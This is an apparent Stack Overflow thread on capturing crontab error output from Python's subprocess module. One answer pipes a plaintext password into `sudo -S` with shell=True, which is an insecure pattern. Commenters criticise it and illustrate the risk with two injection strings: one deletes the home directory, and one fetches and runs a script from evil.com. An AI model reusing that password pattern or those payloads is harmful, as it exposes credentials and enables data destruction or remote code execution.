# Trying to capture results of 'crontab -l' in Python

Tags: python

Trying to capture in a variable the results of the bash command `su <username> -c 'crontab -l` in a Python script.

I've tried various methonds using `subprocess.run` or `subprocess.check_output` with nothing capturing the `stderr` message `You (username) are not allowed to use this program (crontab)`.

My latest effort:

```
try:
    result = subprocess.run(f"su username -c "crontab -l" | sed "s/\\*/-g"', shell=True, capture_output=True, text=True)#,stderr=subprocess.STDOUT)

The comment at the end of the line is expermenting with stderr redirect on and off.

    if result.returncode == 0
         crontab_output = result.stdout
    else:
         crontab_error = result.stderr
except Exception as e:
    print("an error has occurred crontab: {e}")
```

I've had success capturing the contents of crontab, but I've never been able to capture the error message if user doesn't have rights to use crontab.

Comment: This code isn't syntactically valid, in multiple ways. Please [edit] to fix it. For reference see [mre]. BTW, for more tips, like how to write a good title, see [ask].

Comment: Test output caturing on simple command like `ls /etc /error`, then replace the command with `su --whatever`, but ditch `sed` and do the whole text processing in Python.

Comment: I've trimmed this down to just crontab -l without the su -c with the same result.  I can capture the contents of the crontab file if it exists, but I can't capture the error message.

Comment: `subprocess.run(<command>, capture_output=True)` works just fine both for `crontab -l` and `crontab -u root -l`.  Please post the exact problematic code.

Comment: Mind, if the error is being written _direct to the tty_, that would explain it not being captured. If that's genuinely what's happening, wrapping with `unbuffer` will fix it.

Comment: I found the issue is with the returncode.  User not allowed message populates stderr but the returncode is 0.

Answer (score 0):

If you need sudo will need more work but for begin this should works

```
import subprocess
result = subprocess.Popen('crontab -l', stderr=subprocess.PIPE,stdout=subprocess.PIPE, shell=True).communicate()
print(result)
```

Maybe this:

```
import subprocess
password = 'your_password'
cmd = f'echo {password} | sudo -S your_command'
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
```

Comment: Better to leave `shell=False` and use `['crontab', '-l']`

Comment: ...your current code turns into `subprocess.Popen(['sh', '-c', 'crontab -l'])` -- you're running an extra process (a copy of `sh`) without any particularly good reason to do so.

Comment: And **definitely** don't use `echo {password} | ...` with `shell=True` -- that puts the password somewhere others can use it with `ps`

Comment: It also lets a password do something hostile -- say someone claims to your software that their password is `$(rm -rf ~)`; you don't want your home directory deleted. Same for `$(curl http://evil.com/rootme.sh | sh)`, etc etc.

Comment: It's safer to leave out the `echo {password} |` and instead use `.communicate(password)` (which you're already enabling with `stdin=subprocess.PIPE`).

Answer (score 0):

```
import subprocess
import sys


def run(cmd_as_list):
    try:
        result = subprocess.run(cmd_as_list, capture_output=True)
    except Exception as e:
        print("Error while running '{}': {}".format(" ".join(cmd_as_list), e),
              file=sys.stderr)
        # do what you need here, re-raise exception, sys.exit() or whatever
        # I opted for simple `return`
        return
    print(f"stdout: {result.stdout}")
    if result.returncode:
        print(f"stderr: {result.stderr}")
```

A snippet to test:

```
for cmd in ('ls /etc/passwd /err',
            'krontablol 666',
            'crontab -l',
            'su -u root crontab -l'):
    print(f" ~> {cmd}")
    run(cmd.split())
```

Results

```txt
 ~> ls /etc/passwd /err
stdout: b'/etc/passwd\n'
stderr: b"ls: cannot access '/err': No such file or directory\n"
 ~> krontablol 666
Error while running 'krontablol': [Errno 2] No such file or directory: 'krontablol'
 ~> crontab -l
stdout: b'13 * * * *      /some/command\n'
 ~> crontab -u root -l
stdout: b''
stderr: b'crontab: must be privileged to use -u\n'
```